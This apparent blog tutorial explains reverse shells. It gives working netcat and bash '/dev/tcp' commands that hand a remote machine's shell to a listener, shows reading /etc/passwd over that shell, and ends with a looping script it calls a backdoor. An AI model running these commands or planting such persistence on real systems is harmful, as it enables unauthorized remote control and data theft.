Information In or Information Out

With security being a big concern for different sectors of computing from large corporations and all the way down to an individual user, there's thousands of different ways you can protect yourself from external threats. A common misconception with the internet and saying safe online is that whilst you might have long passwords set against your systems user accounts with tight privileges and a descent firewall in place, yes you might be stopping the big bad world of hackers from getting into your PC to steal your bank details only to find out your overdrawn and behind a month on you rent, but ask yourself this.

Whats to stop them getting out?

This is something people still often overlook and do not take seriously enough, information on all computer systems travels both in and out of a machine unless that machine has been been strictly configured not to, and trust me there's not many people or corporations that configure their machines this way.

So what's Reverse Shell you say.

A reverse shell is a type of connection in which the target machine (Somebody Else's Computer) communicates back to the attacking machine (Your Computer). The attacking machine is patiently sat their listening on a port on which it receives the connection from the Target Machine, once this connection takes place you can usually have the target machine hand over control to you, this is particularly useful if you want to connect remotely to a target machine that is behind a firewall or a router.

I have even used these in the past on my own machines with some clever scripting as a safety back door just in case I lock myself (it happens more often than you think).

Reverse Shells using netcat (nc).

One of the most widely used tools for creating a reverse shell is netcat which is available for both Windows & Linux but for the sake of my sanity and the fact nobody cares I won't waste anybody's time explaining how this works on Windows. To follow this tutorial your going to need two machines to experiment on, and during this tutorial I will refer to these machines as local (Your Machine) and remote (Not Your Machine).

One of the first things required is the installation of netcat which you will have to follow on both the local and remote machines.

Installing netcat (nc)

These steps detail how to install netcat by compiling from source however on common Linux distributions it's possible to install from the standard repositories.

cd ~
sudo apt-get install -y build-essential -qq > /dev/null
wget -q http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz
tar -xzf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure > log-file 2>&1
sudo make > log-file 2>&1
sudo make install > log-file 2>&1
cd ~
sudo rm -R netcat*

Remember to run the above commands on both machines, all log output is written to log-file in the following directory.

~/netcat-0.7.1

To test that netcat is installed correctly run the following command.

nc --version

You should see something similar to this.

netcat (The GNU Netcat) 0.7.1
Copyright (C) 2002 - 2003  Giovanni Giacobbi

This program comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of this program under the terms of
the GNU General Public License.
For more information about these matters, see the file named COPYING.

Original idea and design by Avian Research <hobbit@avian.org>,
Written by Giovanni Giacobbi <giovanni@giacobbi.net>.

Setting up the Local Machine

So the first thing you wan't to do is get the local machine set up listening for incoming connections to do this just run the following command.

nc -vv -l -p 4444

Your machine will now start listening for connections on all addresses at port 4444, Other ports are available. To give you an idea of what the above command is doing run nc --help.

Setting up the Remote Machine

Now that you have set up your local machine we will staring going though the different ways you can make the reverse shell connection from the remote machine back to your local machine.

Using netcat to initiate a reverse shell:

To initiate a reverse shell connection back to your local machine, run the following command. Remember to replace <local ip> with the IP address of your local machine.

nc -e /bin/bash <local ip> 4444

On your local machine you will see something along the lines of Connection from <local ip>:46198 appear in terminal, this means your connected!

On your local machine you will probably end up with a blinking cursor on a newline, this is what you should expect to see, try running cat /etc/passwd and take a look at the output, you have just successfully read a list of available system user accounts.

When your finished just press CTRL + C to close the connection.

Using bash to initiate a reverse shell:

If for some reason you can't run bash on your remote machine then you can use bash to initiate a reverse shell, some people prefer this as once it's connected you can see that bash has been handed over to the local machine and is much more interactive on the local side than using netcat.

To initiate a reverse shell connection back to your local machine, run the following command. Again remember to replace <local ip> with the IP address of your local machine.

bash -i >& /dev/tcp/<local ip>/4444 0>&1

On your local machine you wont see the same connection response as netcat instead you will see the bash prompt appear on your local machine waiting for you to send a command. Again, this means your connected!

Try running cat /etc/passwd again and you will notice the same response when using netcat, once more you have just successfully read a list of available system user accounts.

When your finished just press CTRL + C to close the connection.

Keeping it alive.

Whilst experimenting on two servers with netcat or bash, one of the main things to take into account is that whilst you have access to both machines and you can play around to get used to how netcat and bash communicate from a remote machine to a local one, what do you do to keep this access point alive? How do we keep the remote side alive so we can connect again at a later date?

Now there's a million and one ways you can do this and coming up with new inventive ways of doing this specific thing is a game I often enjoy playing. In the spirit of learning you can simply use a script on the remote machine to try the connection every X seconds, simple right? Well the bash script is below for you.

#!/usr/bin/env bash

while :
do
bash -i >& /dev/tcp/<local ip>/4444 0>&1
sleep 15
done

Add the code above to a file on the remote machine called temp.sh. Again, don't forget to change <local ip> to match the IP address of your local machine, now run sudo chmod +X ./temp.sh to make it executable. Now run bash ./temp.sh and the bash script on the remote machine will try to connect to the local machine, if the connection attempt back to the local machine is unsuccessful the script will sleep for 15 seconds then try again.

The above means that as long as the script on the remote machine stays running you can connect and disconnect as many times as you like from your local machine just by firing up terminal and running nc -vv -l -p 4444.

Congratulations, you now have a very basic & crude back door onto a remote machine. Enjoy!

If you read this and you would like to give any feedback or discuss the tutorial any further, please email sutherland@scripting.online.